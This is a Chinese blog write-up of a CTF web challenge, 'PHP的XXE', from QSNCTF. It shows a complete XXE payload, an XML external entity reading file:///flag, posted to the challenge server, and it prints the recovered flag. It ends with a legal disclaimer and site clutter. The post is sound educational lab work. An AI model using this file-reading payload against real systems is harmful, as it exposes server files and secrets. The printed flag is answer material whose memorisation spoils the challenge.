【CTF Web】QSNCTF PHP的XXE Writeup(PHP+XXE漏洞)

已于 2024-05-15 00:21:09 修改
阅读量335 收藏 5
点赞数 5
分类专栏: CTF Writeup 文章标签: 前端 php 开发语言 web安全 网络安全 安全
于 2024-05-15 00:19:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34988204/article/details/138035601
版权

PHP的XXE

题目描述
XXE(XML External Entity)是一种针对XML解析器的攻击技术,也被称为XML外部实体注入攻击。当应用程序解析用户提供的XML输入时,如果没有正确地配置或过滤外部实体,攻击者可以利用这一漏洞执行恶意操作。

XML允许在文档中定义和使用外部实体,这些实体可以从外部资源(如文件、网络URL等)中获取数据。如果应用程序解析了包含恶意外部实体的XML输入,并且未对外部实体进行适当的处理或限制,攻击者可能会读取敏感文件、执行远程代码或进行其他恶意活动。

解法

是一个 phpinfo 页面。

用 hackbar 发送 POST 请求,URL:

http://challenge.qsnctf.com:31987/simplexml_load_string.php

请求体:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///flag" >]>
<root>
<name>&xxe;</name>
</root>

编码方式选择 application/x-www-form-urlencoded (raw)。

取得 flag。

Flag

qsnctf{c95258852f75481a8506d9f9cf85b04b}

参考资料

  • https://blog.csdn.net/weixin_45808483/article/details/122000030

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任

HEX9CF
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF---Web---SQL注入---12---referer修改+手动添加参数
qq_22160557的博客
08-01 786
文章目录前言一、题目描述二、解题步骤1、修改请求包2、手动添加参数3、sqlmap三、总结 前言 题目分类: CTFWeb—SQL注入—12—referer修改+手动添加参数 一、题目描述 题目:SQL注入 二、解题步骤 1、修改请求包 Step1:访问http://172.16.15.203/stage/5/6C9428036D386316.php, 弹框“本页面仅接受来自 www.10086.cn的访问”,提示修改“referer”参数 Step2:抓包另存为txt,并修改referer为www
CTF---Web---SQL注入---04---F12network+XXF伪造+sqlmap跑文件
qq_22160557的博客
07-29 1105
文章目录前言一、题目描述二、解题步骤1、信息隐藏2、XXF伪造3、sqlmap文件注入三、总结 前言 题目分类: CTFWeb—SQL注入—04—F12network+XXF伪造+ sqlmap跑文件 一、题目描述 题目:Simple_Calc_1,简单计算器 提示:XFF伪造 二、解题步骤 1、信息隐藏 Step1:F12—>查看network,刷新一下,就可以看到/backend/目录, 提示:{“success”:true,“count”:2},是访问次数 2、XXF伪造 Step2:其
CTF Web】XCTF GFSJ0485 simple_php Writeup(代码审计+GET请求+PHP弱类型漏洞
HEX9CF的技术博客
05-06 371
小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。
青少年CTFPHP的后门、PHP/8.1.0-dev漏洞
weixin_69830800的博客
11-15 1818
题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行。
CTF-web-xff,referer 知识点;
半岛铁盒的博客
12-01 1021
xff全称为X-Forwarded-Forxff在一般客户端的HTTP请求中是不存在的,但是当经过代理服务器时,代理服务器就会加上一个xff,其内容为客户端的IP地址,如果后面还有代理服务器,那么会在后面依次加上上一个代理服务器的IP,所以这就给了我们伪造IP的可能,如果我们在客户端发送HTTP请求时加上一个XFF,并且将其地址指向另一个IP,那么服务器就会将我们主机当成一个代理服务器,而把我们写的IP当成客户端。 具体使用:X-Forwarded-For: referer是HTTP请求中的一部分,代表着
VulnHub_XXE xxe writeup ctfgame_logs
m0_58543272的博客
08-27 936
vulnhub的一个xxe靶场的全程writeup
CTF php代码审计 strpos()函数漏洞 XXE漏洞xinclude()
baynk的博客
03-21 3095
这个题之间弄了好一会,都没搞出来,一直没时间,今天下定决定把它做出来!!! <?php highlight_file(__FILE__); class Login { public function __construct($user, $pass) { $this->loginViaXml($user, $pass); } ...
第八章-XXE漏洞
guoyuxin3的博客
11-14 272
第一节 XML快速入门 1.1 XML介绍及用途 XML 被设计用来传输和存储数据。XML 文档形成了一种树结构,它从"根部"开始,然后扩展到"枝叶"。XML 允许创作者定义自己的标签和自己的文档结构。 <?xml version="1.0" encoding="UTF-8"?> <note> <to>Tove</to> <from>J...
[ctf web][GoogleCTF2019 Quals]Bnv writeup
ShenZ的博客
02-11 1937
是json格式的,将json改成xml格式能不能打xxe Content-type: application/json Content-type: application/xml 首先构造DTD,申明实体b,申明元素message > 其实之前做得题目都是不用申明元素的,这里如果不申明会报 > No declaration for element message, line 5, column 23 xml <?xml version="1.0" encoding="utf-8
CTF-Web-Challenge:使用PHPWeb中进行CTF挑战
03-25
CTF-网络挑战使用PHPWeb中进行CTF挑战链接: :
CTF PHP离线chm文档
08-09
CTF PHP离线chm文档
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同时根据八个具体案例详细描述漏洞的利用方式。 【想要搭建vulnhub内靶场可关注博主,然后私聊我哦】 同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站...
PHP反序列化漏洞详解.rar
02-07
PHP反序列化漏洞详解-CTF
Hackzone-tunisia-CTF:网站 CTF php + mysql + bootstrap
06-02
Hackzone-突尼斯-CTF 网站 CTF php + mysql + bootstrap 导入 hackzone.sql 更改 config/config.php 文件
vue源码之mustache模板引擎1
qweasl_的博客
05-21 467
模板引擎的一个有点:它是将数据转为视图的最优雅的方法。相信vue的玩家首先想到的是。而还没学vue的朋友,就只能进行dom操作了。通过数组的join方法。以及es6推出的模板字符串。
【详细介绍WebKit的结构】
cz88888888666的博客
05-23 573
WebKit是一个开源的浏览器引擎,主要用于渲染网页内容,它最初由苹果公司为其Safari浏览器开发,目前被多种浏览器和应用程序使用,包括所有基于iOS和macOS的浏览器,WebKit的设计目标是提供快速、精准且流畅的网页浏览体验。
超详细的前后端实战项目(Spring系列加上vue3)前端篇(二)(一步步实现+源码)
最新发布
2301_79969279的博客
05-24 1105
好了,兄弟们,继昨天的项目之后,开始继续敲前端代码,完成前端部分昨天完成了全局页面的代码,和登录页面的代码,不过昨天的代码还有一些需要补充的,这里添加一下。
深入解析:Element Plus 与 Vite、Nuxt、Laravel 的结合使用
一个普通人
05-23 1164
Element Plus 作为一个强大的 Vue.js 组件库,可以与 Vite、Nuxt 和 Laravel 等不同的工具和框架结合使用,为开发者提供灵活、高效的开发体验。根据项目需求选择合适的工具和框架,可以极大地提升开发效率和应用性能
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),并提交给平台进行验证。 "此地无银三百"是ctf-qsnctf平台上的一道题目,它的名称可能是一个提示,暗示着解题的思路。具体的解题方法和答案我无法透露,因为这会破坏比赛的公平性和乐趣。如果你对这道题目感兴趣,我建议你在ctf-qsnctf平台上注册账号并参与比赛,通过自己的努力和思考来解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值